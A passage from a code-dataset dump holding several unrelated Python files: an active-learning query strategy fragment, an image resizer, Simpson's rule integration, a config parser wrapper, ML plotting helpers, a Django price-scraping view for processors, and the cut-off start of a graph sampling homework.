yhat[i, idx_poolf[i, :p]] = 1\n\n score = ((1 - yhat * f) / 2).sum(axis=1)\n ask_id = self.random_state_.choice(np.where(score == np.max(score))[0])\n return unlabeled_entry_ids[ask_id]\n","repo_name":"ntucllab/libact","sub_path":"libact/query_strategies/multilabel/maximum_margin_reduction.py","file_name":"maximum_margin_reduction.py","file_ext":"py","file_size_in_byte":4830,"program_lang":"python","lang":"en","doc_type":"code","stars":767,"dataset":"github-code","pt":"51"} +{"seq_id":"3001244954","text":"from PIL import Image\r\nimport ctypes\r\nimport resize_img.py\r\n\r\n#f = open(\"C:\\\\Users\\\\yuri\\\\Documents\\\\Yuri's work\\\\0. Assorted\\\\_Script\\\\_image processing\\\\Python\\\\2. Placing images on 1000x1000\\\\_text\\\\importFileNih.txt\", 'r+', encoding='utf-8')\r\n#importFileName = [line for line in f.read().splitlines()]\r\n#f.close()\r\n\r\n#white = (255,255,255)\r\n#image = Image.new('RGB', (1000,1000), white)\r\n#image.save(\"C:\\\\Users\\\\yuri\\\\Documents\\\\Yuri's work\\\\0. Assorted\\\\_Script\\\\_image processing\\\\Python\\\\2. Placing images on 1000x1000\\\\ngetest.jpg\")\r\n\r\nimg = Image.open(\"C:\\\\Users\\\\yuri\\\\Documents\\\\Yuri's work\\\\0. Assorted\\\\_Script\\\\_image processing\\\\Python\\\\2. Placing images on 1000x1000\\\\SS-22 - GEDEAN.jpg\", 'r')\r\nimg.convert('RGB')\r\n\r\nmaxSize = (1000, 1000)\r\nimg.thumbnail(maxSize, Image.ANTIALIAS)\r\n\r\nimg_w, img_h = img.size\r\nwhite = (255, 255, 255, 255)\r\nbackground = Image.new('RGB', (1000, 1000), white)\r\nbg_w, bg_h = background.size\r\noffset = ((bg_w - img_w) // 2, (bg_h - img_h) // 2)\r\nbackground.paste(img, offset)\r\nbackground.save(\"C:\\\\Users\\\\yuri\\\\Documents\\\\Yuri's work\\\\0. 
Assorted\\\\_Script\\\\_image processing\\\\Python\\\\2. Placing images on 1000x1000\\\\ngetest2.jpg\")\r\n\r\n###############################\r\n\r\n#width = 1000\r\n#height = 1000\r\n#imgOri = Image.open(\"C:\\\\Users\\\\yuri\\\\Documents\\\\Yuri's work\\\\0. Assorted\\\\_Script\\\\_image processing\\\\Python\\\\2. Placing images on 1000x1000\\\\SS-22.jpg\", 'r')\r\n#imgOri.convert('RGB')\r\n#w, h = imgOri.size\r\n\r\n","repo_name":"spartacruz/Resizer-Image","sub_path":"Placing Images.py","file_name":"Placing Images.py","file_ext":"py","file_size_in_byte":1453,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"51"} +{"seq_id":"42239615974","text":"'''\n/**\n * date : 15:56, 2022-04-28\n * author : Ruijie Zhang@Huazhong University of Sci & Tech\n * mail : zrjhust@gmail.com\n**/\n'''\n\nimport numpy as np\nimport time\nimport copy\n\ndef e42():\n\tdef f_s(q):\n\t\tif q == 1:\n\t\t\treturn lambda x: 0.1*(x**6) - x**2 + x,0,2,122/105\n\t\tif q == 2:\n\t\t\treturn lambda x: x*x**(1/2),0,1,2/5\n\t\tif q == 3:\n\t\t\treturn lambda x: 1/(x**(1/2)),5,200,2*np.sqrt(200)-2*np.sqrt(5)\n\tdef sim_calcu_nomal(a,b,func,intervals):\n\t\tn = intervals# intervals\n\t\th = abs(a-b)/n\n\t\tans = func(a)+func(b)\n\t\tv1,v2 = 0,0\n\t\tfor i in range(0,n):\n\t\t\tv1 += func(a + h*(i+1/2))\n\t\tfor i in range(1,n):\n\t\t\tv2 += func(a + h*i)\n\t\tans = (h/6)*(ans + 4*v1 + 2*v2)\n\t\treturn n,ans\n\n\tdef sim_calcu_n(a,b,func,intervals=1):\n\t\tdelta = 0.5*1e-7\n\t\tn,ans = sim_calcu_nomal(a,b,func,intervals)\n\t\ttemp = 0\n\t\twhile abs(ans - temp) >= (4**2-1)*delta:\n\t\t\ttemp = ans\n\t\t\tintervals *= 2\n\t\t\tn,ans = sim_calcu_nomal(a,b,func,intervals)\n\n\t\treturn n,ans\n\n\tq=int(input('Select the sub-question to view (enter an int)'))\n\tfunc,a,b,real = f_s(q)\n\tn,ans = sim_calcu_n(a,b,func)\n\tprint(\"True value:\",real)\n\tprint(\"Simpson successive interval halving:\",\"\\n\",\"nodes required:\",n,\"\\n\",\"result:\",ans)\n\n\n\tdelta = 0.5*1e-7\n\tin_sim = 1\n\tn_sim,re_sim = sim_calcu_nomal(a,b,func,in_sim)\n\twhile abs(real - re_sim) >= delta:\n\t\tin_sim += 1\n\t\tn_sim , re_sim = sim_calcu_nomal(a,b,func,in_sim)\n\tprint(\"Composite Simpson's rule:\",\"\\n\",\"nodes required:\",n_sim,\"\\n\",\"result:\",re_sim)","repo_name":"K1seki221/numerical_analysis_experiment","sub_path":"e42.py","file_name":"e42.py","file_ext":"py","file_size_in_byte":1444,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"51"} +{"seq_id":"12769302069","text":"# _*_coding:utf-8_*_\n\nfrom box import Box\nfrom configparser import ConfigParser\n\n#source: https://www.jianshu.com/p/2e795cba28ab\n#https://github.com/cdgriffith/Box\n#https://zhuanlan.zhihu.com/p/437046499\n\nclass ConfTool(ConfigParser):\n\n    def __init__(self, file, encoding=\"utf-8\"):\n        # call the parent class constructor\n        super().__init__()\n        self.read(filenames=file, encoding=encoding)\n\n    # if the section or option cannot be found, return the given default\n    def get_or_default(self, section, option, default=None):\n        if not self.has_section(section):\n            return default\n        elif not self.has_option(section, option):\n            return default\n        # https://github.com/cdgriffith/Box\n        return self.get(section=section, option=option)\n\n    # convert the ini file contents into a dict\n    def to_dict(self):\n        _dict = {}\n        for section in self.sections():\n            # print(dict(self.items(\"mysql_conf\")))\n            _option_dict = dict(self.items(section=section))\n            _dict.update({section: _option_dict})\n        return _dict\n\n    # use the python-box module for convenient chained access\n    def __getattr__(self, item):\n        '''\n        Purpose of __getattr__: if attribute lookup fails on the instance and on the corresponding class (via __dict__), 
then the class's __getattr__ function is called; if this function is not defined, an AttributeError is raised. This shows that __getattr__ is always the last step of attribute lookup, the fallback.\n\n        '''\n        # Box returns the object itself, so its attributes/functions can be called in a chain, e.g. self.len().sum().value\n        _box = Box(self.to_dict())\n        # https://www.jianshu.com/p/2bc2605f84fb\n        # getattr(object, name[, default])\n        # works for classes, functions or attribute variables; returns the default if the function or attribute is not found\n        return getattr(_box, item)\n\n\nif __name__ == '__main__':\n    conf = ConfTool(file=\"./db_conf.ini\")\n    # if the mysql user field is not configured in the config file, default to root\n    print(conf.get_or_default(\"mysql_conf\", \"user\", \"root\"))\n    print(conf.to_dict())\n    # config values can also be fetched via attribute access\n    print(conf.mysql_conf.host)\n'''\n[mysql_conf] ; 1. in an ini config file, the value inside [] is called a section\nhost = 127.0.0.1 ; 3. a key-value pair under a section is called an option\nport = 3306 ; 4. a section may contain multiple options, i.e. multiple key-value config items\nusername = root\npassword = 123456\n[python] ; 2. a single ini file may contain multiple sections\nversion = 0.1.9\nsystem_env = mac\n'''\n","repo_name":"liuyinzhe/template_script","sub_path":"model/configparser/ini_parser.py","file_name":"ini_parser.py","file_ext":"py","file_size_in_byte":2630,"program_lang":"python","lang":"zh","doc_type":"code","stars":0,"dataset":"github-code","pt":"51"} +{"seq_id":"13443903083","text":"\n##### This is taken from the data provider; don't understand why it is necessary\n\n\n\n\n# adapted from projects finding_donors and customer_segments\n###########################################\n# Suppress matplotlib user warnings\n# Necessary for newer version of matplotlib\nimport warnings\n\nwarnings.filterwarnings(\"ignore\", category=UserWarning, module=\"matplotlib\")\n#\n# Display inline matplotlib plots with IPython\nfrom IPython import get_ipython\n\nget_ipython().run_line_magic('matplotlib', 'inline')\n###########################################\n\nimport matplotlib.pyplot as pl\nimport matplotlib.patches as mpatches\n\nimport matplotlib.pyplot as plt\nimport pandas as pd\nimport numpy as np\n\n\ndef distribution(data, transformed=False):\n    \"\"\"\n    Visualization code for displaying skewed distributions of features\n    \"\"\"\n\n    # Create figure\n    fig = pl.figure(figsize=(11, 5))\n\n    # Skewed feature plotting\n    for i, feature in enumerate(['capital-gain', 'capital-loss']):\n        ax = fig.add_subplot(1, 2, i + 1)\n        ax.hist(data[feature], bins=25, color='#00A0A0')\n        ax.set_title(\"'%s' Feature Distribution\" % (feature), fontsize=14)\n        ax.set_xlabel(\"Value\")\n        ax.set_ylabel(\"Number of Records\")\n        ax.set_ylim((0, 2000))\n        ax.set_yticks([0, 500, 1000, 1500, 2000])\n        ax.set_yticklabels([0, 500, 1000, 1500, \">2000\"])\n\n    # Plot aesthetics\n    if transformed:\n        fig.suptitle(\"Log-transformed Distributions of Continuous Census Data Features\", \\\n                     fontsize=16, y=1.03)\n    else:\n        fig.suptitle(\"Skewed Distributions of Continuous Census Data Features\", \\\n                     fontsize=16, y=1.03)\n\n    fig.tight_layout()\n    fig.show()\n\n\ndef evaluate(results, accuracy, f1):\n    \"\"\"\n    Visualization code to display results of various learners.\n    \n    inputs:\n      - learners: a list of supervised learners\n      - stats: a list of dictionaries of the statistic results from 'train_predict()'\n      - accuracy: The score for the naive predictor\n      - f1: The score for the naive predictor\n    \"\"\"\n\n    # Create figure\n    fig, ax = pl.subplots(2, 3, figsize=(11, 7))\n\n    # Constants\n    bar_width = 0.25\n    colors = ['#A00000', '#00A0A0', '#00A000', 'yellow']\n\n    # Super loop to plot four panels of data\n    for k, learner in enumerate(results.keys()):\n        for j, metric in enumerate(['train_time', 'acc_train', 'f_train', 'pred_time', 'acc_test', 'f_test']):\n            for i in np.arange(3):\n                # Creative plot code\n                ax[j // 3, j % 3].bar(i + k * 
bar_width, results[learner][i][metric], width=bar_width, color=colors[k])\n ax[j // 3, j % 3].set_xticks([0.45, 1.45, 2.45])\n ax[j // 3, j % 3].set_xticklabels([\"1%\", \"10%\", \"100%\"])\n ax[j // 3, j % 3].set_xlabel(\"Training Set Size\")\n ax[j // 3, j % 3].set_xlim((-0.1, 3.0))\n\n # Add unique y-labels\n ax[0, 0].set_ylabel(\"Time (in seconds)\")\n ax[0, 1].set_ylabel(\"Accuracy Score\")\n ax[0, 2].set_ylabel(\"F-score\")\n ax[1, 0].set_ylabel(\"Time (in seconds)\")\n ax[1, 1].set_ylabel(\"Accuracy Score\")\n ax[1, 2].set_ylabel(\"F-score\")\n\n # Add titles\n ax[0, 0].set_title(\"Model Training\")\n ax[0, 1].set_title(\"Accuracy Score on Training Subset\")\n ax[0, 2].set_title(\"F-score on Training Subset\")\n ax[1, 0].set_title(\"Model Predicting\")\n ax[1, 1].set_title(\"Accuracy Score on Testing Set\")\n ax[1, 2].set_title(\"F-score on Testing Set\")\n\n # Add horizontal lines for naive predictors\n ax[0, 1].axhline(y=accuracy, xmin=-0.1, xmax=3.0, linewidth=1, color='k', linestyle='dashed')\n ax[1, 1].axhline(y=accuracy, xmin=-0.1, xmax=3.0, linewidth=1, color='k', linestyle='dashed')\n ax[0, 2].axhline(y=f1, xmin=-0.1, xmax=3.0, linewidth=1, color='k', linestyle='dashed')\n ax[1, 2].axhline(y=f1, xmin=-0.1, xmax=3.0, linewidth=1, color='k', linestyle='dashed')\n\n # Set y-limits for score panels\n ax[0, 1].set_ylim((0, 1))\n ax[0, 2].set_ylim((0, 1))\n ax[1, 1].set_ylim((0, 1))\n ax[1, 2].set_ylim((0, 1))\n\n # Create patches for the legend\n patches = []\n for i, learner in enumerate(results.keys()):\n patches.append(mpatches.Patch(color=colors[i], label=learner))\n pl.legend(handles=patches, bbox_to_anchor=(-.80, 2.53), \\\n loc='upper center', borderaxespad=0., ncol=4, fontsize='x-large')\n\n # Aesthetics\n pl.suptitle(\"Performance Metrics for Three Supervised Learning Models\", fontsize=16, y=1.10)\n # pl.tight_layout()\n pl.show()\n\n\ndef feature_plot(importances, X_train, num_features):\n # Display the five most important features\n indices = np.argsort(importances)[::-1]\n columns = X_train.columns.values[indices[:num_features]]\n values = importances[indices][:num_features]\n\n # Creat the plot\n fig = pl.figure(figsize=(9, 5))\n pl.title(\"Normalized Weights for First \" + str(num_features) + \" Most Predictive Features\", fontsize=16)\n pl.bar(np.arange(num_features), values, width=0.6, align=\"center\", color='#00A000', \\\n label=\"Feature Weight\")\n pl.bar(np.arange(num_features) - 0.3, np.cumsum(values), width=0.2, align=\"center\", color='#00A0A0', \\\n label=\"Cumulative Feature Weight\")\n pl.xticks(np.arange(num_features), columns)\n pl.xlim((-0.5, num_features - .5))\n pl.ylabel(\"Weight\", fontsize=12)\n pl.xlabel(\"Feature\", fontsize=12)\n\n pl.legend(loc='upper center')\n pl.tight_layout()\n pl.show()\n return columns\n\n\ndef pca_results(good_data, pca):\n '''\n Create a DataFrame of the PCA results\n Includes dimension feature weights and explained variance\n Visualizes the PCA results\n '''\n\n # Dimension indexing\n dimensions = ['Dimension {}'.format(i) for i in range(1, len(pca.components_) + 1)]\n\n # PCA components\n components = pd.DataFrame(np.round(pca.components_, 4), columns=list(good_data.keys()))\n components.index = dimensions\n\n # PCA explained variance\n ratios = pca.explained_variance_ratio_.reshape(len(pca.components_), 1)\n variance_ratios = pd.DataFrame(np.round(ratios, 4), columns=['Explained Variance'])\n variance_ratios.index = dimensions\n\n # Create a bar plot visualization\n fig, ax = plt.subplots(figsize=(14, 8))\n\n # 
Plot the feature weights as a function of the components\n components.plot(ax=ax, kind='bar');\n ax.set_ylabel(\"Feature Weights\")\n ax.set_xticklabels(dimensions, rotation=0)\n\n # Display the explained variance ratios\n for i, ev in enumerate(pca.explained_variance_ratio_):\n ax.text(i - 0.40, ax.get_ylim()[1] + 0.05, \"Explained Variance\\n %.4f\" % (ev))\n\n # Return a concatenated DataFrame\n return pd.concat([variance_ratios, components], axis=1)\n\n\nfrom sklearn.metrics import fbeta_score\nfrom sklearn.metrics import accuracy_score\nfrom time import time\n\n\ndef train_predict(learner, sample_size, X_train, y_train, X_test, y_test, beta):\n '''\n inputs:\n - learner: the learning algorithm to be trained and predicted on\n - sample_size: the size of samples (number) to be drawn from training set\n - X_train: features training set\n - y_train: income training set\n - X_test: features testing set\n - y_test: income testing set\n '''\n\n results = {}\n\n start = time()\n learner = learner.fit(X_train[:sample_size], y_train[:sample_size])\n end = time()\n\n results['train_time'] = end - start\n\n start = time()\n predictions_test = learner.predict(X_test)\n predictions_train = learner.predict(X_train[:300])\n end = time()\n\n results['pred_time'] = end - start\n\n results['acc_train'] = accuracy_score(y_train[:300], predictions_train)\n\n results['acc_test'] = accuracy_score(y_test, predictions_test)\n\n results['f_train'] = fbeta_score(y_train[:300], predictions_train, beta=beta)\n\n results['f_test'] = fbeta_score(y_test, predictions_test, beta=beta)\n\n print(\"{} trained on {} samples.\".format(learner.__class__.__name__, sample_size))\n\n return results\n","repo_name":"shailendrabhandari/ACIT4630_Advanced_MLandDL","sub_path":"visuals.py","file_name":"visuals.py","file_ext":"py","file_size_in_byte":8034,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"51"} +{"seq_id":"13945383524","text":"from django.shortcuts import render\r\nfrom bs4 import BeautifulSoup\r\nfrom django.http import HttpResponseRedirect\r\nimport requests, time, re\r\nfrom .models import Soket, Proc, Price\r\n\r\n\r\ndef get_pr(pr, i, href, price):\r\n pr = Proc.objects.get(name=pr)\r\n i_t = 0\r\n try:\r\n price_list = Price.objects.get(tovar=pr)\r\n except Exception:\r\n price_list = Price(tovar=pr)\r\n if price_list.adress1 == None or price_list.adress1 == \"\":\r\n price_list.adress1 = href\r\n price_list.price1 = price\r\n i_t = 1\r\n elif price_list.adress2 == None or price_list.adress2 == \"\":\r\n price_list.adress2 = href\r\n price_list.price2 = price\r\n i_t = 2\r\n elif price_list.adress3 == None or price_list.adress3 == \"\":\r\n price_list.adress3 = href\r\n price_list.price3 = price\r\n i_t = 3\r\n elif price_list.adress4 == None or price_list.adress4 == \"\":\r\n price_list.adress4 = href\r\n price_list.price4 = price\r\n i_t = 4\r\n elif price_list.adress5 == None or price_list.adress5 == \"\":\r\n price_list.adress5 = href\r\n price_list.price5 = price\r\n i_t = 5\r\n elif price_list.adress6 == None or price_list.adress6 == \"\":\r\n price_list.adress6 = href\r\n price_list.price6 = price\r\n i_t = 6\r\n elif price_list.adress7 == None or price_list.adress7 == \"\":\r\n price_list.adress7 = href\r\n price_list.price7 = price\r\n i_t = 7\r\n elif price_list.adress8 == None or price_list.adress8 == \"\":\r\n price_list.adress8 = href\r\n price_list.price8 = price\r\n i_t = 8\r\n elif price_list.adress9 == None or price_list.adress9 == \"\":\r\n 
price_list.adress9 = href\r\n price_list.price9 = price\r\n i_t = 9\r\n elif price_list.adress10 == None or price_list.adress10 == \"\":\r\n price_list.adress10 = href\r\n price_list.price10 = price\r\n i_t = 10\r\n price_list.save()\r\n print(\"{0}){1} Сохранен\".format(i_t, pr))\r\n\r\n\r\ndef price(request):\r\n print(\"hello2\")\r\n proc = Proc.objects.all()\r\n for pr1 in proc:\r\n pr = pr1.name.replace('Процессор ', '')\r\n\r\n # url_html = get_url(\"https://repka.ua/catalogsearch/result/?q={0}\".format(pr))\r\n i = 0\r\n # try:\r\n # li_list = soup_price(url_html)\r\n # for li in li_list:\r\n # pr_shor = pr[pr.find('[') + 1:pr.find(']')]\r\n # if li.find('a', class_=\"name\").getText().find(pr_shor) != -1:\r\n # href = li.find('a')['href']\r\n # price = li.find('span', class_=\"price\").getText()\r\n # price = int(price.replace('грн', '').replace(' ', '').replace(' ', ''))\r\n # print(price)\r\n # print(li.find('a')['href'])\r\n #\r\n # get_pr(pr1.name, i, href, price)\r\n #\r\n # i += 1\r\n # break\r\n # except:\r\n # print(\"В репке нет: {0}\".format(pr1.name))\r\n\r\n # url_html = get_url(\"https://eldorado.ua/search?q={0}\".format(pr))\r\n # i = 0\r\n # try:\r\n # li_list = soup_price_2(url_html)\r\n # for li in li_list:\r\n # pr_shor = pr[pr.find('[') + 1:pr.find(']')]\r\n # if li.find('div', class_=\"title lp\").find('div').getText().find(pr_shor) != -1:\r\n # href = li.find('div', class_=\"title lp\").find('a')['href']\r\n # href = \"https://eldorado.ua{0}\".format(href)\r\n # price = li.find('div', class_=\"current-price h1\").getText()\r\n # price = int(price[:price.find(' ')])\r\n # print(pr1.name)\r\n # print(href)\r\n # print(price)\r\n # get_pr(pr1.name, i, href, price)\r\n # i += 1\r\n # break\r\n # except Exception:\r\n # print(\"В магазине Eldarado нет товара: {0}\".format(pr))\r\n # pr_shor = pr[pr.find('[') + 1:pr.find(']')]\r\n # url_html = get_url(\r\n # \"http://amain.com.ua/index.php?route=product/search&search={0}&filter_category_id=1579\".format(pr_shor))\r\n # i = 0\r\n # try:\r\n # li_list = soup_price_3(url_html)\r\n # for li in li_list:\r\n # a = li.find('a', class_=\"product-title to-left color-black\")\r\n # if a == None:\r\n # continue\r\n # if li.find('a', class_=\"product-title to-left color-black\").getText().find(pr_shor) != -1:\r\n # href = li.find('a', 'product-title to-left color-black')['href']\r\n # try:\r\n # price = li.find('p', class_=\"price color-orange\").getText()\r\n # price = int(price.replace('грн', '').replace(' ', '').replace(' ', ''))\r\n # except Exception:\r\n # price = 0\r\n # print(pr1.name)\r\n # print(href)\r\n # print(price)\r\n # get_pr(pr1.name, i, href, price)\r\n # i += 1\r\n # break\r\n # except Exception:\r\n # print(\"В магазине amain нет товара: {0}\".format(pr))\r\n\r\n # pr_shor = pr[pr.find('[') + 1:pr.find(']')]\r\n # url_html = get_url(\"https://telemart.ua/search/?search_que={0}&id_category=398\".format(pr_shor))\r\n # i = 0\r\n # try:\r\n # li_list = soup_price_4(url_html)\r\n # for li in li_list:\r\n # a = li.find('a')\r\n # if a == None:\r\n # continue\r\n # href = li.find('a')['href']\r\n # try:\r\n # price = li.find('div', class_=\"b-price\").getText()\r\n # price = int(price.replace('грн', '').replace(' ', '').replace(' ', ''))\r\n # except Exception:\r\n # price = 0\r\n # print(pr1.name)\r\n # print(href)\r\n # print(price)\r\n # get_pr(pr1.name, i, href, price)\r\n # i += 1\r\n # break\r\n # except Exception:\r\n # print(\"В магазине allo нет товара: {0}\".format(pr))\r\n # pr_shor = pr[pr.find('[') + 
# pr_shor = pr[pr.find('[') + 1:pr.find(']')]\r\n # url_html = get_url(\"http://57.kharkov.ua/search?title={0}&term_node_tid_depth=All\".format(pr_shor))\r\n # i = 0\r\n # try:\r\n # li_list = soup_price_5(url_html)\r\n # # print(li_list)\r\n # for li in li_list:\r\n # a = li.find('div', class_=\"views-field-title\").find('a')\r\n # if a is None:\r\n # continue\r\n # href = \"57.kharkov.ua{0}\".format(li.find('div', class_=\"views-field-title\").find('a')['href'])\r\n # try:\r\n # price = li.find('div', 'sell-price').getText()\r\n # price = int(price.replace('грн.', '').replace(' ', '').replace(' ', ''))\r\n # except Exception:\r\n # price = 0\r\n # print(pr1.name)\r\n # print(href)\r\n # print(price)\r\n # get_pr(pr1.name, i, href, price)\r\n # i += 1\r\n # break\r\n # except Exception:\r\n # print(\"fallo store has no item: {0}\".format(pr))\r\n price_1 = Price.objects.all()\r\n for price_list in price_1:\r\n sm = []\r\n adress = []\r\n if price_list.adress1 is not None and price_list.adress1 != \"\":\r\n sm.append(price_list.price1)\r\n adress.append(price_list.adress1)\r\n # sm1 = price_list.price1\r\n i_t = 1\r\n if price_list.adress2 is not None and price_list.adress2 != \"\":\r\n # sm2 = price_list.price2\r\n sm.append(price_list.price2)\r\n adress.append(price_list.adress2)\r\n\r\n i_t = 2\r\n if price_list.adress3 is not None and price_list.adress3 != \"\":\r\n # sm3 = price_list.price3\r\n adress.append(price_list.adress3)\r\n sm.append(price_list.price3)\r\n i_t = 3\r\n if price_list.adress4 is not None and price_list.adress4 != \"\":\r\n # sm4 = price_list.price4\r\n i_t = 4\r\n adress.append(price_list.adress4)\r\n sm.append(price_list.price4)\r\n if price_list.adress5 is not None and price_list.adress5 != \"\":\r\n # sm5 = price_list.price5\r\n adress.append(price_list.adress5)\r\n i_t = 5\r\n sm.append(price_list.price5)\r\n if price_list.adress6 is not None and price_list.adress6 != \"\":\r\n # sm6 = price_list.price6\r\n adress.append(price_list.adress6)\r\n i_t = 6\r\n sm.append(price_list.price6)\r\n if price_list.adress7 is not None and price_list.adress7 != \"\":\r\n # sm7 = price_list.price7\r\n adress.append(price_list.adress7)\r\n i_t = 7\r\n sm.append(price_list.price7)\r\n if price_list.adress8 is not None and price_list.adress8 != \"\":\r\n # sm8 = price_list.price8\r\n adress.append(price_list.adress8)\r\n i_t = 8\r\n sm.append(price_list.price8)\r\n if price_list.adress9 is not None and price_list.adress9 != \"\":\r\n # sm9 = price_list.price9\r\n adress.append(price_list.adress9)\r\n i_t = 9\r\n sm.append(price_list.price9)\r\n if price_list.adress10 is not None and price_list.adress10 != \"\":\r\n # sm10 = price_list.price10\r\n adress.append(price_list.adress10)\r\n\r\n i_t = 10\r\n sm.append(price_list.price10)\r\n # print(\"{0}, {1}, {2}, {3}, {4}, {5}, {6}, {7}, {8}, {9}\".format(sm1, sm2, sm3, sm4, sm5, sm6, sm7, sm8, sm9,\r\n # sm10))\r\n # print(i_t)\r\n if not sm:\r\n continue\r\n ji = 0\r\n min_price = sm[0]\r\n adr = adress[0]\r\n for ch in sm:\r\n print(ch)\r\n if ch != 0:\r\n if ch < min_price:\r\n min_price = ch\r\n adr = adress[ji]\r\n ji += 1\r\n price_list.count = i_t\r\n prr = price_list.tovar\r\n prr.min_price = min_price\r\n prr.min_price_ad = adr\r\n price_list.save()\r\n prr.save()\r\n print(\"money: {0}\".format(min_price))\r\n return HttpResponseRedirect(request.META[\"HTTP_REFERER\"])\r\n\r\n\r\ndef soup_price_5(html):\r\n temp = BeautifulSoup(html, 'lxml').find('div', class_=\"item-list\").find_all('li')\r\n # print(html)\r\n return temp\r\n\r\n\r\ndef soup_price_4(html):\r\n temp = BeautifulSoup(html, 'lxml').find_all('div', class_=\"b-i-product 
product_wrapper \")\r\n # print(temp)\r\n return temp\r\n\r\n\r\ndef soup_price(html):\r\n temp = BeautifulSoup(html, 'lxml').find_all('li', class_=\"item product product-item\")\r\n return temp\r\n\r\n\r\ndef soup_price_2(html):\r\n temp = BeautifulSoup(html, 'lxml').find_all('div', class_=\"goods-item false\")\r\n return temp\r\n\r\n\r\ndef soup_price_3(html):\r\n temp = BeautifulSoup(html, 'lxml').find_all('div', class_=\"white-block\")\r\n return temp\r\n\r\n\r\ndef update(request):\r\n print(\"hello1\")\r\n url_html = get_url(\"http://ek.ua/list/186/\")\r\n\r\n temp_soup = BeautifulSoup(url_html, 'lxml').find('div', class_=\"ib page-num\").find_all('a')\r\n ind = 0\r\n for i in temp_soup:\r\n if ind != 0:\r\n url_html = get_url(\"http://ek.ua/list/186/{0}/\".format(ind))\r\n ind += 1\r\n # form and pagination\r\n main_page = parsing(url_html)\r\n # the form\r\n table = main_page.find('form').find_all('table', class_=\"conf-table\")\r\n for tr in table:\r\n mas = ['Socket', 'Серия', 'Кол-во', 'Тактовая', 'GPU',\r\n 'Частота TurboBoost /', 'Техпроцесс', 'Архитектура',\r\n '1-го уровня', '2-го уровня', '3-го уровня', 'Тепловыделение',\r\n 'инструкций', 'объем', 'Макс. частота']\r\n a_link = tr.find_all('a', class_=\"conf-name\")\r\n for href in a_link:\r\n html = get_url(\"http://ek.ua{0}\".format(href['href']))\r\n charact = pars_proc(html)\r\n table_list = charact.find_all('table', id=\"help_table\")\r\n kyller = int_vid = False\r\n mas_to = []\r\n for tr_hl in table_list:\r\n print(\"_______\")\r\n temp = tr_hl.find(text=re.compile(r'Комплектуется кулером'))\r\n if temp is not None:\r\n par = temp.parent.parent.parent.parent\r\n img = par.find('img')\r\n if img['src'] == \"/img/icons/bul_141.gif\":\r\n kyller = True\r\n temp = tr_hl.find(text=re.compile(r'Интегрированная графика'))\r\n if temp is not None:\r\n par = temp.parent.parent.parent.parent\r\n img = par.find('img')\r\n if img['src'] == \"/img/icons/bul_141.gif\":\r\n int_vid = True\r\n name = BeautifulSoup(html, 'lxml').find('div', id=\"top-page-title\").find('h1',\r\n class_=\"t2\").getText()\r\n print(\"Processor) {0}\".format(name))\r\n print(\"Bundled cooler) {0}\".format(kyller))\r\n print(\"Integrated graphics) {0}\".format(int_vid))\r\n for ch in mas:\r\n temp = tr_hl.find(text=re.compile(r\"{0}\".format(ch)))\r\n if temp is not None:\r\n par = temp.parent.parent.parent\r\n if par.find('td', class_=\"op3\"):\r\n t = \"\"\r\n else:\r\n par = par.parent\r\n try:\r\n xar = par.find('td', class_=\"op3\").getText()\r\n except Exception:\r\n continue\r\n if ch == \"Socket\":\r\n try:\r\n sk = Soket.objects.get(name=xar)\r\n pr1 = Proc(name=name, cooler=kyller, integer_video=int_vid, sok=sk)\r\n except Exception:\r\n sk = Soket(name=xar)\r\n sk.save()\r\n pr1 = Proc(name=name, cooler=kyller, integer_video=int_vid, sok=sk)\r\n print(sk)\r\n print(\"{0}) {1}\".format(ch, xar))\r\n if ch == 'Серия':\r\n pr1.series = xar\r\n elif ch == \"Кол-во\":\r\n pr1.count_core = xar\r\n elif ch == \"Тактовая\":\r\n pr1.clock_freq = xar\r\n elif ch == \"GPU\":\r\n pr1.model_GPU = xar\r\n elif ch == \"Частота TurboBoost /\":\r\n pr1.freq = xar\r\n elif ch == \"Техпроцесс\":\r\n pr1.proc_tech = xar\r\n elif ch == \"Архитектура\":\r\n pr1.architecture = xar\r\n elif ch == \"1-го уровня\":\r\n pr1.L1 = xar\r\n elif ch == \"2-го уровня\":\r\n pr1.L2 = xar\r\n elif ch == \"3-го уровня\":\r\n pr1.L3 = xar\r\n elif ch == \"Тепловыделение\":\r\n pr1.TDP = xar\r\n elif ch == \"инструкций\":\r\n pr1.sup_instr = xar\r\n elif ch == \"объем\":\r\n pr1.max_vol = 
xar\r\n elif ch == \"Макс. частота\":\r\n pr1.max_kanal = xar\r\n pr1.save()\r\n mas_to.append(xar)\r\n\r\n return HttpResponseRedirect(request.META[\"HTTP_REFERER\"])\r\n\r\n\r\ndef get_url(url):\r\n url_html = None\r\n kol = 0\r\n while kol < 3:\r\n try:\r\n url_html = get_html(url)\r\n kol = 3\r\n except Exception:\r\n kol += 1\r\n time.sleep(kol)\r\n return url_html\r\n\r\n\r\ndef get_html(url):\r\n response = requests.get(url)\r\n response.encoding = 'utf-8'\r\n return response.text\r\n\r\n\r\ndef pars_proc(html):\r\n soup = BeautifulSoup(html, 'lxml')\r\n list_temp = soup.find('div', id='conf_item_descr')\r\n return list_temp\r\n\r\n\r\ndef parsing(html):\r\n soup = BeautifulSoup(html, 'lxml')\r\n list_temp = soup.find('td', class_='main-part-content')\r\n return list_temp\r\n","repo_name":"XBoBaX/shop_and_game","sub_path":"proccesor/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":17421,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"51"} +{"seq_id":"74918872157","text":"import torch\n\nimport copy\nimport time\nimport numpy as np\n\nfrom daphne import daphne\n\nfrom primitives import baseprimitives, distlist\nfrom evaluation_based_sampling import evaluate_program, expectation_calculator\n\nfrom tests import is_tol, run_prob_test, load_truth\n\nfrom plot import draw_hists, draw_trace, draw_log_joint, draw_hitmap\nimport matplotlib.pyplot as plt\n\nimport wandb\n\nwandb.init(project=\"HW4\", entity=\"aliseyfi\")\n\ndef topological_sort(graph):\n nodes = graph[1]['V']\n edges = graph[1]['A']\n is_visited = dict.fromkeys(nodes, False)\n node_stack = []\n node_order_reverse = []\n for node in nodes:\n if not is_visited[node]:\n node_stack.append((node, False))\n while len(node_stack) > 0:\n node, flag = node_stack.pop()\n if flag:\n node_order_reverse.append(node)\n continue\n is_visited[node] = True\n node_stack.append((node, True))\n if node not in edges:\n continue\n children = edges[node]\n for child in children:\n if not is_visited[child]:\n node_stack.append((child, 